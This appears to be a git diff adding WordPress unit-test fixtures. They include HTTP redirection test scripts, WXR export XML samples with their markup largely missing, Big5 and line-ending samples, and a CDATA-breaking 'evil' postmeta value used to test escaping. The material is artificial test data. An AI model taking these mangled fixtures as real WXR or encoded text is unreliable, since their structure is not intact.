+22801 +22805 +22807 +22809 +22810 +22811 +22812 +22813 +22816 +22822 +22823 +22828 +22834 +22837 +22839 +22840 +22844 +22845 +22846 +22854 +22857 +22860 +22862 +22869 +22875 +22879 +22880 +22881 +22884 +22887 +22889 +22894 +22895 +22898 +22917 +22921 +22922 +22924 +22925 +22926 +22935 +22936 +22937 +22938 +22940 +22942 +22946 +22949 +22950 +22951 +22952 +22957 +22959 +22961 +22965 +22966 +22967 +22968 +22969 +22970 +22971 +22972 +22974 +22976 +22980 +22984 +22986 +22988 +22990 +22992 +22993 +22994 +22995 +22996 +22997 +22999 +23002 +23003 +23005 +23008 +23016 +23017 +23020 +23022 +23023 +23025 +23032 +23033 +23034 +23040 +23041 +23044 +23045 +23047 +23049 +23050 +23056 +23057 +23060 +23061 +23062 +23069 +23072 +23074 +23076 +23082 +23083 +23084 +23085 +23087 +23088 +23091 +23092 +23096 +23099 +23103 +23108 +23110 +23113 +23115 +23116 +23117 +23120 +23122 +23127 +23132 +23133 +23135 +23142 +23144 +23148 +23149 +23150 +23159 +23160 +23162 +23165 +23168 +23169 +23171 +23172 +23173 +23179 +23183 +23185 +23188 +23196 +23202 +23203 +23205 +23207 +23212 +23221 +23225 +23227 +23228 +23229 +23230 +23233 +23236 +23237 +23243 +23247 +23251 +23253 +23256 +23257 +23260 +23261 +23268 +23269 +23270 +23275 +23276 +23278 +23279 +23280 +23281 +23285 +23287 +23290 +23291 +23292 +23307 +23308 +23309 +23311 +23314 +23316 +23318 +23321 +23323 +23327 +23328 +23329 +23330 +23331 +23332 +23335 +23336 +23339 +23341 +23342 +23343 +23346 +23349 +23350 +23353 +23355 +23356 +23358 +23361 +23362 +23363 +23364 +23365 +23367 +23368 +23369 +23371 +23373 +23374 +23377 +23378 +23379 +23380 +23382 +23383 +23387 +23389 +23391 +23393 +23395 +23398 +23399 +23401 +23406 +23407 +23408 +23410 +23411 +23412 +23413 +23416 +23420 +23421 +23422 +23423 +23424 +23427 +23428 +23429 +23430 +23431 +23436 +23438 +23442 +23444 +23447 +23453 +23454 +23455 +23458 +23460 +23462 +23463 +23464 +23465 +23466 +23469 +23470 +23473 +23475 +23476 +23477 +23478 +23479 +23482 +23483 +23485 +23487 +23490 +23491 +23496 +23498 +23501 +23506 +23509 +23517 +23520 +23525 +23531 +23532 +23537 +23554 +23559 +23560 +23561 +23562 +23569 +23575 +23576 +23577 +23578 +23587 +23589 +23591 +23601 +23602 +23603 +23605 +23609 +23616 +23622 +23627 +23630 +23634 +23635 +23636 +23637 +23650 +23661 +23662 +23668 +23669 +23677 +23680 +23681 +23684 +23685 +23686 +23687 +23691 +23692 +23694 +23704 +23706 +23709 +23711 +23712 +23720 +23721 +23728 +23729 +23731 +23734 +23738 +23746 +23747 +23748 +23749 +23750 +23755 +23756 +23757 +23759 +23760 +23764 +23767 +23768 +23776 +23778 +23779 +23781 +23785 +23786 +23794 +23797 +23800 +23801 +23805 +23806 +23808 +23822 +23825 +23832 +23833 +23834 +23836 +23845 +23847 +23849 +23855 +23856 +23857 +23862 +23863 +23865 +23866 +23867 +23870 +23873 +23881 +23882 +23883 +23895 +23902 +23904 +23905 +23907 +23908 +23909 +23912 +23914 +23915 +23923 +23931 +23932 +23934 +23939 +23944 +23950 +23951 +23954 +23956 +23973 +23975 +23981 +23982 +23983 +23986 +23987 +23988 +23989 +24005 +24008 +24016 +24017 +24019 +24023 +24026 +24030 +24032 +24035 +24040 +24042 +24044 +24047 +24048 +24049 +24051 +24054 +24055 +24057 +24061 +24063 +24064 +24065 +24066 +24067 +24068 +24071 +24077 +24081 +24084 +24085 +24088 +24093 +24096 +24098 +24101 +24103 +24104 +24106 +24107 +24111 +24119 +24122 +24124 +24128 +24131 +24132 +24137 +24138 +24142 +24143 +24144 +24145 +24146 +24148 +24149 +24150 +24153 +24156 +24157 +24160 +24161 +24164 +24168 +24169 +24173 +24178 +24181 +24189 +24193 +24201 +24205 +24209 +24221 +24225 +24237 +24241 +24244 +24245 +24248 +24251 +24252 +24255 +24257 +24266 +24273 +24280 +24283 +24284 +24285 +24293 +24295 +24296 +24305 +24312 +24313 +24318 +24324 +24325 +24328 +24338 +24345 +24352 +24354 +24368 +24369 +24371 +24375 +24378 +24380 +24381 +24385 +24386 +24387 +24392 +24397 +24398 +24399 +24403 +24408 +24409 +24411 +24415 +24423 +24428 +24430 +24431 +24434 +24439 +24442 +24444 +24447 +24450 +24456 +24457 +24461 +24463 +24465 +24468 +24470 +24472 +24473 +24478 +24480 +24486 +24487 +24488 +24490 +24491 +24495 +24496 +24497 +24498 +24500 +24501 +24508 +24509 +24511 +24512 +24514 +24517 +24518 +24523 +24527 +24528 +24529 +24530 +24531 +24532 +24533 +24534 +24535 +24536 +24537 +24541 +24542 +24543 +24545 +24548 +24549 +24552 +24554 +24556 +24558 +24565 +24566 +24567 +24572 +24573 +24578 +24579 +24581 +24585 +24587 +24588 +24597 +24598 +24600 +24601 +24603 +24604 +24605 +24606 +24608 +24613 +24617 +24618 +24622 +24625 +24633 +24635 +24636 +24638 +24642 +24646 +24648 +24654 +24655 +24656 +24657 +24660 +24661 +24664 +24666 +24667 +24668 +24669 +24670 +24671 +24672 +24674 +24675 +24678 +24679 +24680 +24682 +24684 +24685 +24686 +24688 +24689 +24693 +24696 +24705 +24709 +24710 +24711 +24712 +24713 +24716 +24722 +24724 +24725 +24726 +24727 +24728 +24729 +24730 +24731 +24732 +24733 +24735 +24738 +24740 +24741 +24744 +24748 +24752 +24760 +24761 +24762 +24763 +24764 +24765 +24766 +24767 +24768 +24776 +24777 +24779 +24780 +24781 +24783 +24784 +24785 +24786 +24788 +24791 +24792 +24795 +24799 +24800 +24801 +24802 +24809 +24812 +24813 +24814 +24815 +24818 +24819 +24822 +24824 +24825 +24826 +24827 +24831 +24833 +24835 +24837 +24839 +24841 +24844 +24845 +24847 +24849 +24853 +24856 +24857 +24858 +24859 +24862 +24863 +24864 +24865 +24866 +24867 +24868 +24869 +24870 +24874 +24876 +24877 +24878 +24879 +24881 +24882 +24883 +24884 +24885 +24886 +24888 +24889 +24890 +24891 +24892 +24895 +24899 +24900 +24903 +24906 +24907 +24908 +24909 +24910 +24912 +24914 +24916 +24917 +24921 +24922 +24923 +24925 +24927 +24930 +24931 +24932 +24933 +24934 +24936 +24939 +24940 +24942 +24943 +24944 +24945 +24946 +24948 +24950 +24951 +24952 +24953 +24954 +24955 +24958 +24960 +24961 +24962 +24963 +24966 +24967 +24968 +24970 +24972 +24973 +24974 +24975 +24976 +2833 +4298 +4414 +4539 +4601 +4611 +4857 +5407 +5669 +5689 +5770 +6269 +6481 +6820 +6984 +7532 +7625 +7745 +7773 +7824 +7837 +8107 +8213 +8234 +8368 +8420 +8877 +9300 +9306 +9681 +9683 +9757 +9763 +9883 +9959 +9968 +10149 +10219 +10269 +10425 +10432 +10483 +10501 +10551 +10645 +10683 +10713 +10792 +10840 +10863 +11082 +11202 +11226 +11268 +11297 +11330 +11365 +11378 +11489 +11824 +11910 +12393 +12506 +12694 +12760 +12769 +12789 +12855 +13019 +13049 +13066 +13313 +13327 +13335 +13524 +13568 +13605 +13657 +13835 +14093 +14154 +14156 +14745 +14960 +15073 +15317 +15440 +15586 +15729 +15981 +16165 +16176 +16221 +16433 +16494 +16555 +16613 +16938 +17028 +17120 +17520 +17678 +17780 +18201 +18546 +18552 +18584 +18974 +19706 +20204 +20317 +20345 +20451 +20492 +20928 +20974 +21182 +21653 +21947 +22202 +22229 +22377 +22403 +22474 +22476 +22533 +22649 +22670 +22682 +23012 +23163 +23231 +23299 +23492 +23724 +23969 +24170 +24171 +24871 +3372 +6956 +7665 +8515 +8924 +9134 +9736 +9774 +11212 +11735 +12738 +12914 +13147 +13347 +13569 +14097 +14157 +14326 +14356 +14376 +14761 +14876 +15281 +15397 +15644 +16059 +16484 +17739 +18664 +19950 +21249 +21466 +21636 +21883 +23184 +23505 +23922 +24576 \ No newline at end of file diff --git a/tests/data/.trac-ticket-cache.unit-tests.trac.wordpress.org b/tests/data/.trac-ticket-cache.unit-tests.trac.wordpress.org new file mode 100644 index 0000000000..f32daf2439 --- /dev/null +++ b/tests/data/.trac-ticket-cache.unit-tests.trac.wordpress.org @@ -0,0 +1,29 @@ +¿id +12 +19 +22 +30 +32 +35 +39 +42 +99 +104 +105 +106 +110 +114 +116 +119 +120 +121 +124 +131 +132 +135 +136 +138 +139 +140 +141 +142 \ No newline at end of file diff --git a/tests/data/WPHTTP-testcase-redirection-script.php b/tests/data/WPHTTP-testcase-redirection-script.php new file mode 100644 index 0000000000..da99786544 --- /dev/null +++ b/tests/data/WPHTTP-testcase-redirection-script.php @@ -0,0 +1,112 @@ + $value ) { + if ( stripos($key, 'http') === 0 ) { + $key = strtolower(substr($key, 5)); + echo "$key:$value\n"; + } + } + exit; +} +if ( isset($_GET['multiple-headers']) ) { + header("HeaderName: One", false); + header("HeaderName: Two", false); + header("HeaderName: Three", false); + exit; +} + +if ( isset( $_GET['post-redirect-to-method'] ) ) { + $method = $_SERVER['REQUEST_METHOD']; + $response_code = isset( $_GET['response_code'] ) ? $_GET['response_code'] : 301; + + if ( 'POST' == $method && ! isset( $_GET['redirection-performed'] ) ) { + header( "Location: $url?post-redirect-to-method=1&redirection-performed=1", true, $response_code ); + exit; + } + + echo $method; + exit; + +} + +if ( isset( $_GET['location-with-200'] ) ) { + if ( ! isset( $_GET['redirection-performed'] ) ) { + header( "HTTP/1.1 200 OK" ); + header( "Location: $url?location-with-200=1&redirection-performed", true, 200 ); + echo 'PASS'; + exit; + } + // Redirection was followed + echo 'FAIL'; + exit; +} + +if ( isset( $_GET['print-pass'] ) ) { + echo 'PASS'; + exit; +} + +if ( isset( $_GET['multiple-location-headers'] ) ) { + if ( ! isset( $_GET['redirected'] ) ) { + header( "Location: $url?multiple-location-headers=1&redirected=one", false ); + header( "Location: $url?multiple-location-headers=1&redirected=two", false ); + exit; + } + if ( 'two' != $_GET['redirected'] ) + echo 'FAIL'; + else + echo 'PASS'; + exit; +} + +$rt = isset($_GET['rt']) ? $_GET['rt'] : 5; +$r = isset($_GET['r']) ? $_GET['r'] : 0; + +if ( $r < $rt ) { + $code = isset($_GET['code']) ? (int)$_GET['code'] : 302; + header("Location: $url?rt=" . $rt . "&r=" . ($r+1), true, $code); + echo "Redirect $r of $rt"; + exit; +} +echo "Redirect $r of $rt is FINAL.
"; +echo "GET['rt'] = Total times to redirect. Defaults to 5.
"; +echo "GET['r'] = Current redirection. Defaults to 0.
"; +echo "View Source"; + diff --git a/tests/data/export/crazy-cdata-escaped.xml b/tests/data/export/crazy-cdata-escaped.xml new file mode 100644 index 0000000000..4f4d80fa51 --- /dev/null +++ b/tests/data/export/crazy-cdata-escaped.xml @@ -0,0 +1,46 @@ + + + + 1.1 + http://wp.dev + + Hello world! + http://example.org/?p=1 + Thu, 05 Jan 2012 14:30:46 +0000 + admin + http://example.org/?p=1 + :)]]> + + 1 + 2012-01-05 14:30:46 + 2012-01-05 14:30:46 + open + open + hello-world + publish + 0 + 0 + post + + 0 + + Plain string + + + + Closing CDATA + ]]> + + + Alot of CDATA + closing ]]> + + + + diff --git a/tests/data/export/crazy-cdata.xml b/tests/data/export/crazy-cdata.xml new file mode 100644 index 0000000000..fc7d879c78 --- /dev/null +++ b/tests/data/export/crazy-cdata.xml @@ -0,0 +1,46 @@ + + + + 1.1 + http://wp.dev + + Hello world! + http://example.org/?p=1 + Thu, 05 Jan 2012 14:30:46 +0000 + admin + http://example.org/?p=1 + :)]]> + + 1 + 2012-01-05 14:30:46 + 2012-01-05 14:30:46 + open + open + hello-world + publish + 0 + 0 + post + + 0 + + Plain string + + + + Closing CDATA + ]]> + + + Alot of CDATA + closing ]]> + + + + diff --git a/tests/data/export/invalid-version-tag.xml b/tests/data/export/invalid-version-tag.xml new file mode 100644 index 0000000000..fddaca43bc --- /dev/null +++ b/tests/data/export/invalid-version-tag.xml @@ -0,0 +1,91 @@ + + + + + + + + + + + + + + + + + + + + + + WXR Test Data + http://localhost/ + Blog with sample content for testing + Sat, 09 Oct 2010 15:12:29 +0000 + en + abc + http://localhost/ + http://localhost/ + johnjohndoe@example.org + 1alpha + 2bar + 3beta + 4delta + 5epsilon + 6eta + 7foo + 8foo-barbar + 9gamma + 10iota + 11kappa + 12lambda + 13level-1 + 14level-2level-1 + 15level-3level-2 + 16parent + 17theta + 18uncategorized + 19zeta + 20also-level-3level-2 + 21childparent + 22clippable + 23deuterogamy + 24entablement + 25intermembral + 26masticatory + 27obligato + 28occultation + 29onion + 30pontonier + 31rooftree + 32saccule + 33salpa + 34tag-1 + 35tag-2 + 36tag-3 + 37tag-4 + 38tag-5 + 39tentage + 40post_taxbieup + 41post_taxblah + 42post_taxdigeut + 43post_taxgiyeok + 44post_taxhalb + 45post_taxmieum + 46post_taxnieun + 47post_taxparent-2 + 48post_taxrieul + 49post_taxsiot + 50post_taxtax-1 + 51post_taxtax-2 + 52post_taxblah-halbhalb + 53post_taxchild-parent-2parent-2 + + diff --git a/tests/data/export/malformed.xml b/tests/data/export/malformed.xml new file mode 100644 index 0000000000..06a7076fdb --- /dev/null +++ b/tests/data/export/malformed.xml @@ -0,0 +1,91 @@ + + + + + + + + + + + + + + + + + + + + + + WXR Test Data + http://localhost/ + Blog with sample content for testing + Sat, 09 Oct 2010 15:12:29 +0000 + en + abc + http://localhost/ + http://localhost/ + johnjohndoe@example.org + 1alpha + 2bar + 3beta + 4delta + 5epsilon + 6eta + 7foo + 8foo-barbar + 9gamma + 10iota + 11kappa + 12lambda + 13level-1 + 14level-2level-1 + 15level-3level-2 + 16parent + 17theta + 18uncategorized + 19zeta + 20also-level-3level-2 + 21childparent + 22clippable + 23deuterogamy + 24entablement + 25intermembral + 26masticatory + 27obligato + 28occultation + 29onion + 30pontonier + 31rooftree + 32saccule + 33salpa + 34tag-1 + 35tag-2 + 36tag-3 + 37tag-4 + 38tag-5 + 39tentage + 40post_taxbieup + 41post_taxblah + 42post_taxdigeut + 43post_taxgiyeok + 44post_taxhalb + 45post_taxmieum + 46post_taxnieun + 47post_taxparent-2 + 48post_taxrieul + 49post_taxsiot + 50post_taxtax-1 + 51post_taxtax-2 + 52post_taxblah-halbhalb + 53post_taxchild-parent-2parent-2 + + diff --git a/tests/data/export/missing-version-tag.xml b/tests/data/export/missing-version-tag.xml new file mode 100644 index 0000000000..5bd233e319 --- /dev/null +++ b/tests/data/export/missing-version-tag.xml @@ -0,0 +1,90 @@ + + + + + + + + + + + + + + + + + + + + + + WXR Test Data + http://localhost/ + Blog with sample content for testing + Sat, 09 Oct 2010 15:12:29 +0000 + en + http://localhost/ + http://localhost/ + johnjohndoe@example.org + 1alpha + 2bar + 3beta + 4delta + 5epsilon + 6eta + 7foo + 8foo-barbar + 9gamma + 10iota + 11kappa + 12lambda + 13level-1 + 14level-2level-1 + 15level-3level-2 + 16parent + 17theta + 18uncategorized + 19zeta + 20also-level-3level-2 + 21childparent + 22clippable + 23deuterogamy + 24entablement + 25intermembral + 26masticatory + 27obligato + 28occultation + 29onion + 30pontonier + 31rooftree + 32saccule + 33salpa + 34tag-1 + 35tag-2 + 36tag-3 + 37tag-4 + 38tag-5 + 39tentage + 40post_taxbieup + 41post_taxblah + 42post_taxdigeut + 43post_taxgiyeok + 44post_taxhalb + 45post_taxmieum + 46post_taxnieun + 47post_taxparent-2 + 48post_taxrieul + 49post_taxsiot + 50post_taxtax-1 + 51post_taxtax-2 + 52post_taxblah-halbhalb + 53post_taxchild-parent-2parent-2 + + diff --git a/tests/data/export/small-export.xml b/tests/data/export/small-export.xml new file mode 100644 index 0000000000..20b3de9364 --- /dev/null +++ b/tests/data/export/small-export.xml @@ -0,0 +1,447 @@ + + + + + + + + + + + + + + + + + + + + + + + trunk + http://localhost/ + Just another WordPress site + Tue, 18 Jan 2011 08:06:21 +0000 + en + 1.1 + http://localhost/ + http://localhost/ + + 1adminlocal@host.null + 2editoreditor@example.org + 3authorauthor@example.org + + 8alpha + 4bar + 9beta + 29chi + 11delta + 12epsilon + 14eta + 3foo + 5foo-barbar + 10gamma + 16iota + 17kappa + 18lambda + 19mu + 20nu + 31omega + 22omicron + 28phi + 23pi + 30psi + 24rho + 25sigma + 26tau + 15theta + 1uncategorized + 32unused-category + 27upsilon + 21xi + 13zeta + 7eternity + 33tag1 + 34tag2 + 35tag3 + + http://wordpress.org/?v=3.1-RC2-17315 + + + Hello world! + http://localhost/?p=1 + Tue, 18 Jan 2011 07:40:14 +0000 + author + http://localhost/?p=1 + + + + 1 + 2011-01-18 07:40:14 + 2011-01-18 07:40:14 + open + open + hello-world + publish + 0 + 0 + post + + 0 + + + Post by + + + + _edit_last + + + + 1 + + + http://wordpress.org/ + + 2011-01-18 07:40:14 + 2011-01-18 07:40:14 + To delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.]]> + 1 + + 0 + 0 + + + + Sample Page + http://localhost/?page_id=2 + Tue, 18 Jan 2011 07:40:14 +0000 + admin + http://localhost/?page_id=2 + + Hi there! I'm a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin' caught in the rain.) + +...or something like this: + +
The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickies to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.
+ +As a new WordPress user, you should go to your dashboard to delete this page and create new pages for your content. Have fun!]]>
+ + 2 + 2011-01-18 07:40:14 + 2011-01-18 07:40:14 + open + open + sample-page + publish + 0 + 0 + page + + 0 + + _wp_page_template + + +
+ + Child Page + http://localhost/?page_id=4 + Tue, 18 Jan 2011 07:45:50 +0000 + admin + http://localhost/?page_id=4 + + + + 4 + 2011-01-18 07:45:50 + 2011-01-18 07:45:50 + open + open + child-page + publish + 6 + 0 + page + + 0 + + _edit_last + + + + _wp_page_template + + + + + Parent Page + http://localhost/?page_id=6 + Tue, 18 Jan 2011 07:46:09 +0000 + admin + http://localhost/?page_id=6 + + + + 6 + 2011-01-18 07:46:09 + 2011-01-18 07:46:09 + open + open + parent-page + publish + 0 + 0 + page + + 0 + + _edit_last + + + + _wp_page_template + + + + + Draft Page + http://localhost/?page_id=9 + Wed, 30 Nov -0001 00:00:00 +0000 + admin + http://localhost/?page_id=9 + + + + 9 + 2011-01-18 07:46:29 + 0000-00-00 00:00:00 + open + open + + draft + 0 + 0 + page + + 0 + + _edit_last + + + + _wp_page_template + + + + + 1-col page + http://localhost/?page_id=11 + Tue, 18 Jan 2011 07:46:57 +0000 + admin + http://localhost/?page_id=11 + + + + 11 + 2011-01-18 07:46:57 + 2011-01-18 07:46:57 + open + open + 1-col-page + publish + 0 + 0 + page + + 0 + + _edit_last + + + + _wp_page_template + + + + + Private Post + http://localhost/?p=13 + Tue, 18 Jan 2011 07:47:19 +0000 + admin + http://localhost/?p=13 + + + + 13 + 2011-01-18 07:47:19 + 2011-01-18 07:47:19 + open + open + private-post + private + 0 + 0 + post + + 0 + + + + + + _edit_last + + + + + Foo-child + http://localhost/?p=15 + Tue, 18 Jan 2011 07:48:07 +0000 + editor + http://localhost/?p=15 + + + + 15 + 2011-01-18 07:48:07 + 2011-01-18 07:48:07 + open + open + foo-child + publish + 0 + 0 + post + + 0 + + + _edit_last + + + + Post by + + + + + Top-level Foo + http://localhost/?p=17 + Tue, 18 Jan 2011 07:48:32 +0000 + admin + http://localhost/?p=17 + + + + 17 + 2011-01-18 07:48:32 + 2011-01-18 07:48:32 + open + open + top-level-foo + publish + 0 + 0 + post + + 0 + + + _edit_last + + + + + Non-standard post format + http://localhost/?p=19 + Tue, 18 Jan 2011 07:48:52 +0000 + admin + http://localhost/?p=19 + + + + 19 + 2011-01-18 07:48:52 + 2011-01-18 07:48:52 + open + open + non-standard-post-format + publish + 0 + 0 + post + + 0 + + + + _edit_last + + + + + Many Categories + http://localhost/?p=22 + Tue, 18 Jan 2011 07:55:01 +0000 + admin + http://localhost/?p=22 + + + + 22 + 2011-01-18 07:55:01 + 2011-01-18 07:55:01 + open + open + many-categories + publish + 0 + 0 + post + + 0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + _edit_last + + + +
+
diff --git a/tests/data/export/test-serialized-postmeta-no-cdata.xml b/tests/data/export/test-serialized-postmeta-no-cdata.xml new file mode 100644 index 0000000000..dd75787f42 --- /dev/null +++ b/tests/data/export/test-serialized-postmeta-no-cdata.xml @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + + + + + + + + + Test With Serialized Postmeta + http://test.wordpress.org/ + Just another blog + Mon, 30 Nov 2009 21:35:27 +0000 + http://wordpress.org/?v=2.8.4 + en + 1.0 + http://test.wordpress.org/ + http://test.wordpress.org/ + +My Entry with Postmeta +http://test.wordpress.org/postemta +Tue, 30 Nov 1999 00:00:00 +0000 + + + + + + +http://test.wordpress.org/postmeta + + + +122 +2009-10-20 16:13:20 +0000-00-00 00:00:00 +open +open + +draft +0 +0 +post + + +post-options +a:2:{s:18:"special_post_title";s:15:"A special title";s:11:"is_calendar";s:0:"";} + + + + + diff --git a/tests/data/export/test-serialized-postmeta-with-cdata.xml b/tests/data/export/test-serialized-postmeta-with-cdata.xml new file mode 100644 index 0000000000..2fd3923501 --- /dev/null +++ b/tests/data/export/test-serialized-postmeta-with-cdata.xml @@ -0,0 +1,77 @@ + + + + + + + + + + + + + + + + + + + + + + Test With Serialized Postmeta + http://test.wordpress.org/ + Just another blog + Mon, 30 Nov 2009 21:35:27 +0000 + http://wordpress.org/?v=2.8.4 + en + 1.0 + http://test.wordpress.org/ + http://test.wordpress.org/ + +My Entry with Postmeta +http://test.wordpress.org/postemta +Tue, 30 Nov 1999 00:00:00 +0000 + + + + + + +http://test.wordpress.org/postmeta + + + +10 +2009-10-20 16:13:20 +0000-00-00 00:00:00 +open +open + +draft +0 +0 +post + + +post-options + + + +contains-html +some html]]> + + +evil +evil]]> + + + + + diff --git a/tests/data/export/test-utw-post-meta-import.xml b/tests/data/export/test-utw-post-meta-import.xml new file mode 100644 index 0000000000..c491f6d4c8 --- /dev/null +++ b/tests/data/export/test-utw-post-meta-import.xml @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + + + + + + + + + Test With Serialized Postmeta + http://test.wordpress.org/ + Just another blog + Mon, 30 Nov 2009 21:35:27 +0000 + http://wordpress.org/?v=2.8.4 + en + 1.0 + http://test.wordpress.org/ + http://test.wordpress.org/ + +My Entry with UTW Postmeta +http://test.wordpress.org/postmeta-utw +Tue, 30 Nov 1999 00:00:00 +0000 + + + + + + +http://test.wordpress.org/postmeta-utw + + + +150 +2009-10-20 16:13:20 +0000-00-00 00:00:00 +open +open + +draft +0 +0 +post + + +test +a:13:{i:0;O:8:"stdClass":1:{s:3:"tag";s:5:"album";}i:1;O:8:"stdClass":1:{s:3:"tag";s:5:"apple";}i:2;O:8:"stdClass":1:{s:3:"tag";s:3:"art";}i:3;O:8:"stdClass":1:{s:3:"tag";s:7:"artwork";}i:4;O:8:"stdClass":1:{s:3:"tag";s:11:"dead-tracks";}i:5;O:8:"stdClass":1:{s:3:"tag";s:4:"ipod";}i:6;O:8:"stdClass":1:{s:3:"tag";s:6:"itunes";}i:7;O:8:"stdClass":1:{s:3:"tag";s:10:"javascript";}i:8;O:8:"stdClass":1:{s:3:"tag";s:6:"lyrics";}i:9;O:8:"stdClass":1:{s:3:"tag";s:6:"script";}i:10;O:8:"stdClass":1:{s:3:"tag";s:6:"tracks";}i:11;O:8:"stdClass":1:{s:3:"tag";s:22:"windows-scripting-host";}i:12;O:8:"stdClass":1:{s:3:"tag";s:7:"wscript";}} + + + + + diff --git a/tests/data/export/valid-wxr-1.0.xml b/tests/data/export/valid-wxr-1.0.xml new file mode 100644 index 0000000000..587e57123b --- /dev/null +++ b/tests/data/export/valid-wxr-1.0.xml @@ -0,0 +1,282 @@ + + + + + + + + + + + + + + + + + + + + + + Export Dataset + http://localhost/ + Just another WordPress site + Wed, 20 Oct 2010 14:10:09 +0000 + http://wordpress.org/?v=3.0.1 + en + 1.0 + http://localhost/ + http://localhost/ + alpha + beta + parent + uncategorized + childparent + chicken + face + news + roar + + http://wordpress.org/?v=3.0.1 + + + Hello world! + http://localhost/?p=1 + Wed, 20 Oct 2010 14:08:20 +0000 + + + + + + + http://localhost/?p=1 + + + + 1 + 2010-10-20 14:08:20 + 2010-10-20 14:08:20 + open + open + hello-world + publish + 0 + 0 + post + + 0 + + 1 + + + http://wordpress.org/ + + 2010-10-20 14:08:20 + 2010-10-20 14:08:20 + To delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.]]> + 1 + + 0 + 0 + + + + About + http://localhost/?page_id=2 + Wed, 20 Oct 2010 14:08:20 +0000 + + + http://localhost/?page_id=2 + + + + 2 + 2010-10-20 14:08:20 + 2010-10-20 14:08:20 + open + open + about + publish + 0 + 0 + page + + 0 + + _wp_page_template + + + + + Alpha post + http://localhost/?p=4 + Wed, 20 Oct 2010 14:09:37 +0000 + + + + + + + + + + + + + + + http://localhost/?p=4 + + + + 4 + 2010-10-20 14:09:37 + 2010-10-20 14:09:37 + open + open + alpha-post + publish + 0 + 0 + post + + 0 + + _edit_last + + + + _edit_lock + + + + _wp_old_slug + + + + + Child post + http://localhost/?p=6 + Wed, 20 Oct 2010 14:10:09 +0000 + + + + + + + + + + + + + + + http://localhost/?p=6 + + + + 6 + 2010-10-20 14:10:09 + 2010-10-20 14:10:09 + open + open + child-post + publish + 0 + 0 + post + + 0 + + _edit_last + + + + _edit_lock + + + + _wp_old_slug + + + + + Child page + http://localhost/?page_id=8 + Wed, 20 Oct 2010 14:10:35 +0000 + + + http://localhost/?page_id=8 + + + + 8 + 2010-10-20 14:10:35 + 2010-10-20 14:10:35 + open + closed + child-post + publish + 10 + 0 + page + + 0 + + _edit_last + + + + _edit_lock + + + + _wp_page_template + + + + + Parent page + http://localhost/?page_id=10 + Wed, 20 Oct 2010 14:10:44 +0000 + + + http://localhost/?page_id=10 + + + + 10 + 2010-10-20 14:10:44 + 2010-10-20 14:10:44 + open + open + parent-page + publish + 0 + 0 + page + + 0 + + _edit_lock + + + + _edit_last + + + + _wp_page_template + + + + + diff --git a/tests/data/export/valid-wxr-1.1.xml b/tests/data/export/valid-wxr-1.1.xml new file mode 100644 index 0000000000..f389741f1b --- /dev/null +++ b/tests/data/export/valid-wxr-1.1.xml @@ -0,0 +1,112 @@ + + + + + + + + + + + + + + + + + + + + + + + Export Datasets + http://localhost/ + Just another WordPress site + Sat, 16 Oct 2010 20:53:18 +0000 + en + 1.1 + http://localhost/ + http://localhost/ + + 2johnjohndoe@example.org + + 3alpha + 22clippable + 40post_taxbieup + + http://wordpress.org/?v=3.1-alpha + + + Hello world! + http://localhost/?p=1 + Sat, 16 Oct 2010 20:53:18 +0000 + john + http://localhost/?p=1 + + + + 1 + 2010-10-16 20:53:18 + 2010-10-16 20:53:18 + open + open + hello-world + publish + 0 + 0 + post + + 0 + + + + + 1 + + + http://wordpress.org/ + + 2010-10-16 20:53:18 + 2010-10-16 20:53:18 + To delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.]]> + 1 + + 0 + 0 + + + + About + http://localhost/?page_id=2 + Sat, 16 Oct 2010 20:53:18 +0000 + john + http://localhost/?page_id=2 + + + + 2 + 2010-10-16 20:53:18 + 2010-10-16 20:53:18 + open + open + about + publish + 0 + 0 + page + + 0 + + _wp_page_template + + + + + diff --git a/tests/data/formatting/big5.txt b/tests/data/formatting/big5.txt new file mode 100644 index 0000000000..5e0ebb467b --- /dev/null +++ b/tests/data/formatting/big5.txt @@ -0,0 +1,51 @@ +?lmDwgn H@~|Q + +?lDg + +H@ + +DiDAD`DCWiWAD`WCLAW?alQAWUC +G`LAH[?F`AH[uC?APX?WAP? +?C?S?AC + +HG + +?U?AcoQ?AoCGL??A +?Au??AU?gAn?MAeHCOHtHBuL +voAuv?CU@j?A??A?A\ +?~C??~AOHhC + +HT + +|A?QQofA?sQiA?? +COHutHvvA?A?Az?Aj?C`?LL +C???]CuLvAhLvC + +h| + +uDvRA????CWAUvQUA?gAM +AP?Q?FsC^?lHH?C + +H + +?aAHU?QtHAH?m?C?aAS +GH?}A??UXCh?aApuC + +H + +AO??gC??AO??a?CYsA??C + +HC + +?a[C?a?HB[?AH???AG[COHtH +?A~??sCDHLpHG?pC + +HK + +WYCQU?CBH?cAGXDC~aA? +WAPAHAFvA?A?gC??AGL?C + +HE + +??ApwQ?UAiOC?AuQIQ +zA?SC\EhA?DC diff --git a/tests/data/formatting/cr-line-endings-file-header.php b/tests/data/formatting/cr-line-endings-file-header.php new file mode 100644 index 0000000000..e8f3869999 --- /dev/null +++ b/tests/data/formatting/cr-line-endings-file-header.php @@ -0,0 +1,5 @@ ++~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g, + expando = "sizcache" + (Math.random() + '').replace('.', ''), + done = 0, + toString = Object.prototype.toString, + hasDuplicate = false, + baseHasDuplicate = true, + rBackslash = /\\/g, + rReturn = /\r\n/g, + rNonWord = /\W/; + +// Here we check if the JavaScript engine is using some sort of +// optimization where it does not always call our comparision +// function. If that is the case, discard the hasDuplicate value. +// Thus far that includes Google Chrome. +[0, 0].sort(function() { + baseHasDuplicate = false; + return 0; +}); + +var Sizzle = function( selector, context, results, seed ) { + results = results || []; + context = context || document; + + var origContext = context; + + if ( context.nodeType !== 1 && context.nodeType !== 9 ) { + return []; + } + + if ( !selector || typeof selector !== "string" ) { + return results; + } + + var m, set, checkSet, extra, ret, cur, pop, i, + prune = true, + contextXML = Sizzle.isXML( context ), + parts = [], + soFar = selector; + + // Reset the position of the chunker regexp (start from head) + do { + chunker.exec( "" ); + m = chunker.exec( soFar ); + + if ( m ) { + soFar 